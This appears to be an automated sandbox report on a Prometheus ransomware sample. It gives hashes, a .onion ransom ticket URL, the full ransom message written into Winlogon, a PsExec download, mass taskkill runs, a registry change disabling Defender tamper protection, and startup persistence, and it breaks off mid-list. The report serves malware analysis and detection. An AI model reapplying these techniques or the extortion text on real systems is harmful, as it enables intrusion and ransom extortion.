Analysis
-
max time kernel
145s -
max time network
147s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
28-05-2021 06:51
Static task
static1
Behavioral task
behavioral1
Sample
779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
Resource
win10v20210410
General
-
Target
779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
-
Size
233KB
-
MD5
96c565af56a5ba8339f35121bf9ff196
-
SHA1
2edae92d476225b00b4a7ea1e9d7f7ccfda462cb
-
SHA256
779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc
-
SHA512
6d4a3d91396bccae3dff43f6ee295980c1919a48f7914d9b8b6eca3e603aa97b8e05a0b78af27e7f1c86691fff6fc26fad69ddb774f8ed5d8011aa87b511b6c1
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
prometheus
http://promethw27cbrcot.onion/ticket.php?track=LZG-ZNM-YDNM
Extracted
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
prometheus
http://promethw27cbrcot.onion/ticket.php?track=LZG-ZNM-YDNM
Signatures
-
Prometheus Ransomware
Ransomware family mostly targeting manufacturing industry and claims to be affiliated with REvil.
-
Downloads MZ/PE file
-
Downloads PsExec from SysInternals website 1 IoCs
Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.
Processes:
description flow ioc HTTP URL 19 http://live.sysinternals.com/PsExec64.exe -
Executes dropped EXE 1 IoCs
Processes:
1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exepid Process 4312 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe -
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exedescription ioc Process File opened for modification C:\Users\Admin\Pictures\BlockConnect.tiff 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe File opened for modification C:\Users\Admin\Pictures\OutWatch.tiff 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe -
Drops startup file 1 IoCs
Processes:
779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exedescription ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe -
Processes:
1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 49 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid Process 4640 taskkill.exe 4776 taskkill.exe 4488 taskkill.exe 760 taskkill.exe 3344 taskkill.exe 4156 taskkill.exe 4360 taskkill.exe 3040 taskkill.exe 3572 taskkill.exe 3336 taskkill.exe 4320 taskkill.exe 4872 taskkill.exe 5072 taskkill.exe 3896 taskkill.exe 4308 taskkill.exe 4540 taskkill.exe 3888 taskkill.exe 4764 taskkill.exe 4976 taskkill.exe 1672 taskkill.exe 4132 taskkill.exe 3984 taskkill.exe 3648 taskkill.exe 2836 taskkill.exe 4020 taskkill.exe 4104 taskkill.exe 4516 taskkill.exe 4556 taskkill.exe 5028 taskkill.exe 4252 taskkill.exe 2228 taskkill.exe 2820 taskkill.exe 3480 taskkill.exe 1316 taskkill.exe 600 taskkill.exe 4588 taskkill.exe 4692 taskkill.exe 4884 taskkill.exe 3756 taskkill.exe 2464 taskkill.exe 432 taskkill.exe 4444 taskkill.exe 2088 taskkill.exe 4192 taskkill.exe 4372 taskkill.exe 2868 taskkill.exe 1328 taskkill.exe 4204 taskkill.exe 4268 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exe1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exepid Process 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe -
Suspicious use of AdjustPrivilegeToken 56 IoCs
Processes:
779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exePAExec-5568-RJMQBVDN.exe1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exepowershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe Token: SeDebugPrivilege 3984 taskkill.exe Token: SeDebugPrivilege 760 taskkill.exe Token: SeDebugPrivilege 2228 taskkill.exe Token: SeDebugPrivilege 2868 taskkill.exe Token: SeDebugPrivilege 3040 taskkill.exe Token: SeDebugPrivilege 3648 taskkill.exe Token: SeDebugPrivilege 3572 taskkill.exe Token: SeDebugPrivilege 3336 taskkill.exe Token: SeDebugPrivilege 2836 taskkill.exe Token: SeDebugPrivilege 2820 taskkill.exe Token: SeDebugPrivilege 3480 taskkill.exe Token: SeDebugPrivilege 4020 taskkill.exe Token: SeDebugPrivilege 3888 taskkill.exe Token: SeDebugPrivilege 3344 taskkill.exe Token: SeDebugPrivilege 432 taskkill.exe Token: SeDebugPrivilege 1328 taskkill.exe Token: SeDebugPrivilege 1316 taskkill.exe Token: SeDebugPrivilege 600 taskkill.exe Token: SeDebugPrivilege 4104 taskkill.exe Token: SeDebugPrivilege 4156 taskkill.exe Token: SeDebugPrivilege 4204 taskkill.exe Token: SeDebugPrivilege 4268 taskkill.exe Token: SeDebugPrivilege 4320 taskkill.exe Token: SeDebugPrivilege 4360 taskkill.exe Token: SeDebugPrivilege 4444 taskkill.exe Token: SeDebugPrivilege 4556 taskkill.exe Token: SeDebugPrivilege 4588 taskkill.exe Token: SeDebugPrivilege 4640 taskkill.exe Token: SeDebugPrivilege 4692 taskkill.exe Token: SeDebugPrivilege 4776 taskkill.exe Token: SeDebugPrivilege 4764 taskkill.exe Token: SeDebugPrivilege 4884 taskkill.exe Token: SeDebugPrivilege 4872 taskkill.exe Token: SeDebugPrivilege 4976 taskkill.exe Token: SeDebugPrivilege 5028 taskkill.exe Token: SeDebugPrivilege 5072 taskkill.exe Token: SeDebugPrivilege 2088 taskkill.exe Token: SeDebugPrivilege 1672 taskkill.exe Token: SeDebugPrivilege 3756 taskkill.exe Token: SeDebugPrivilege 3896 taskkill.exe Token: SeDebugPrivilege 2464 taskkill.exe Token: SeDebugPrivilege 4132 taskkill.exe Token: SeDebugPrivilege 4192 taskkill.exe Token: SeDebugPrivilege 4372 taskkill.exe Token: SeDebugPrivilege 4252 taskkill.exe Token: SeDebugPrivilege 4308 taskkill.exe Token: SeDebugPrivilege 4540 taskkill.exe Token: SeDebugPrivilege 4332 powershell.exe Token: SeDebugPrivilege 4288 PAExec-5568-RJMQBVDN.exe Token: SeImpersonatePrivilege 4288 PAExec-5568-RJMQBVDN.exe Token: SeAssignPrimaryTokenPrivilege 4288 PAExec-5568-RJMQBVDN.exe Token: SeIncreaseQuotaPrivilege 4288 PAExec-5568-RJMQBVDN.exe Token: SeDebugPrivilege 4312 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe Token: SeDebugPrivilege 4616 powershell.exe Token: SeDebugPrivilege 4620 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exepid Process 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exepid Process 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exedescription pid Process procid_target PID 3924 wrote to memory of 3984 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 78 PID 3924 wrote to memory of 3984 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 78 PID 3924 wrote to memory of 2704 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 80 PID 3924 wrote to memory of 2704 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 80 PID 3924 wrote to memory of 752 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 82 PID 3924 wrote to memory of 752 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 82 PID 3924 wrote to memory of 4052 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 84 PID 3924 wrote to memory of 4052 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 84 PID 3924 wrote to memory of 3680 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 86 PID 3924 wrote to memory of 3680 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 86 PID 3924 wrote to memory of 1356 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 93 PID 3924 wrote to memory of 1356 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 93 PID 3924 wrote to memory of 1452 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 92 PID 3924 wrote to memory of 1452 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 92 PID 3924 wrote to memory of 3844 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 88 PID 3924 wrote to memory of 3844 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 88 PID 3924 wrote to memory of 3884 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 94 PID 3924 wrote to memory of 3884 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 94 PID 3924 wrote to memory of 3720 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 96 PID 3924 wrote to memory of 3720 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 96 PID 3924 wrote to memory of 3288 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 98 PID 3924 wrote to memory of 3288 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 98 PID 3924 wrote to memory of 3556 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 100 PID 3924 wrote to memory of 3556 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 100 PID 3924 wrote to memory of 1344 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 102 PID 3924 wrote to memory of 1344 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 102 PID 3924 wrote to memory of 2228 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 104 PID 3924 wrote to memory of 2228 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 104 PID 3924 wrote to memory of 2868 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 109 PID 3924 wrote to memory of 2868 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 109 PID 3924 wrote to memory of 760 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 107 PID 3924 wrote to memory of 760 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 107 PID 3924 wrote to memory of 3040 3924 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 110 PID 3924 